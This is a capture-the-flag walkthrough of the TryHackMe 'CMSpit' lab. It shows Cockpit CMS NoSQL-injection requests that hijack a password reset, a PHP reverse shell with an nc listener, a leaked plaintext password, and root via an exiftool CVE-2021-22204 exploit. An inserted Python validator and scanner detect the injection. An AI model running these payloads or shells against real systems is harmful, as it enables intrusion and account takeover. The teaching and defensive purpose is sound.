Room Link: https://tryhackme.com/room/cmspit
Initial Scan

Scan all ports.

Kali:
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP

Kali:
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
The Cockpit CMS version is 0.11.1.
User account compromise

This CMS version has a known exploit that helps us enumerate users.
Exploit: https://swarm.ptsecurity.com/rce-cockpit-cms/
Burp:
GET /auth/requestreset HTTP/1.1
Host: 10.10.198.113
Content-Length: 25
Content-type: application/json

{
"user":"admin"
}
Burp:
GET /auth/resetpassword HTTP/1.1
Host: 10.10.198.113
Content-Length: 38
Content-type: application/json

{
"token":{
"$func":"var_dump"
}
}
Burp:
GET /auth/newpassword HTTP/1.1
Host: 10.10.198.113
Content-Length: 66
Content-type: application/json

{
"token":"rp-25badb6dbd66e39732cc3abf8122ba9065b6ee57e7610"
}
I did the same thing for the user skidy.
Burp:
GET /auth/newpassword HTTP/1.1
Host: 10.10.198.113
Content-Length: 66
Content-type: application/json

{
"token":"rp-4472f7f85a07bbc1b08d917a298ad0f365b6e7ce6d85e"
}
I don't know if the last part was really necessary. I think maybe the reset token can be different from the other token, in which case the above step would be necessary, but it's the same, so I just updated the password for skidy.
Burp:
GET /auth/resetpassword HTTP/1.1
Host: 10.10.198.113
Content-Length: 88
Content-type: application/json

{
"token":"rp-4472f7f85a07bbc1b08d917a298ad0f365b6e7ce6d85e",
"password":"hacked"
}
I can now log in as skidy.
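The reset flow above works because the application accepts a JSON object carrying a `$func` query operator where a plain string token is expected, so the object is passed through to the database query layer instead of being compared as a value. The following Python is an added example (not code from the walkthrough or from Cockpit) showing the two defensive pieces a practitioner would want: a strict server-side validator for the reset body that only ever lets string values through, and a scanner that walks decoded request bodies and flags any `$`-prefixed key, which is the signal to alert on in web or proxy logs. The token regex, the minimum password length, the function names and the sample bodies are assumptions made for this example; the first three samples are constructed to mirror the requests shown above.

```python
import json
import re

# Assumed token shape, modelled on the two tokens seen in the walkthrough
# ("rp-" followed by lowercase hex). This is an assumption for the example,
# not Cockpit's documented format.
TOKEN_RE = re.compile(r"^rp-[0-9a-f]{20,64}$")

# Example policy for the new password; an assumption, not the CMS's rule.
MIN_PASSWORD_LEN = 8


def find_operator_keys(value, path="$"):
    """Walk a decoded JSON body and return the JSONPath-style location of every
    key that starts with '$' (MongoDB/MongoLite operators such as $func, $ne,
    $regex). A browser form never needs to send such keys, so any hit is an
    injection attempt worth alerting on."""
    hits = []
    if isinstance(value, dict):
        for key, child in value.items():
            child_path = f"{path}.{key}"
            if key.startswith("$"):
                hits.append(child_path)
            hits.extend(find_operator_keys(child, child_path))
    elif isinstance(value, list):
        for i, child in enumerate(value):
            hits.extend(find_operator_keys(child, f"{path}[{i}]"))
    return hits


def validate_reset_body(raw_body):
    """Hardened check for a /auth/resetpassword body. Returns (ok, reason).
    Only a string token of the expected shape and a string password get
    through, so an operator object can never reach the database query."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return False, "body is not valid JSON"
    if not isinstance(body, dict):
        return False, "body must be a JSON object"
    token = body.get("token")
    password = body.get("password")
    if not isinstance(token, str):
        return False, "token must be a string"
    if not TOKEN_RE.match(token):
        return False, "token has unexpected format"
    if not isinstance(password, str) or len(password) < MIN_PASSWORD_LEN:
        return False, f"password must be a string of at least {MIN_PASSWORD_LEN} characters"
    return True, "ok"


# Constructed sample request bodies: the first three mirror the walkthrough's
# Burp requests, the fourth is a benign reset that should pass validation.
SAMPLE_BODIES = [
    ("/auth/requestreset", '{"user":"admin"}'),
    ("/auth/resetpassword", '{"token":{"$func":"var_dump"}}'),
    ("/auth/resetpassword",
     '{"token":"rp-4472f7f85a07bbc1b08d917a298ad0f365b6e7ce6d85e","password":"hacked"}'),
    ("/auth/resetpassword",
     '{"token":"rp-4472f7f85a07bbc1b08d917a298ad0f365b6e7ce6d85e","password":"correct horse battery"}'),
]


def scan_bodies(samples):
    """Detection pass: return (endpoint, operator key paths) for every body
    that carries a '$'-prefixed key. Unparseable bodies are skipped."""
    findings = []
    for endpoint, raw in samples:
        try:
            body = json.loads(raw)
        except ValueError:
            continue
        ops = find_operator_keys(body)
        if ops:
            findings.append((endpoint, ops))
    return findings


if __name__ == "__main__":
    for endpoint, ops in scan_bodies(SAMPLE_BODIES):
        print(f"ALERT {endpoint}: operator keys at {ops}")
    for endpoint, raw in SAMPLE_BODIES:
        print(endpoint, validate_reset_body(raw))
```

The validator rejects the `$func` body before any query is built, and the scanner flags the same body at `$.token.$func`; the body with the password "hacked" is refused by the example length policy, while the benign fourth body passes.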
Initial Shell

Kali:
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
nc -lvnp 1234
Get autocomplete (upgrade to a fully interactive TTY):
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
Lateral Movement (Stux)

Victim:
cd /home/stux
cat .dbshell

Victim:
su stux
Password: p4ssw0rdhack3d!123
Privilege Escalation

Exploit: https://github.com/convisolabs/CVE-2021-22204-exiftool/blob/master/exploit.py

Victim (receiving):
nc -l -p 1234 > cve.tar.gz

Kali (sending):
git clone https://github.com/se162xg/CVE-2021-22204.git
tar cvf cve.tar.gz CVE-2021-22204/
nc -w 3 $VICTIM 1234 < cve.tar.gz

Victim:
tar xvf cve.tar.gz
cd CVE-2021-22204

Victim:
bash craft_a_djvu_exploit.sh '/bin/bash'
sudo /usr/local/bin/exiftool delicate.jpg